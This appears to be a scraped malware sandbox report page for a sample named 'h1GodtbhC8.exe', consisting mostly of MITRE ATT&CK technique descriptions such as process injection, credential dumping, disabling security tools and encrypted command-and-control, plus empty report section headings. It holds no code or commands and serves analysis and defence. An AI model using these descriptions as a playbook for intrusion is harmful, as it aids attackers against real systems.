Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	API monitoring, MBR, VBR
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report h1GodtbhC8.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Protection of GUI:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre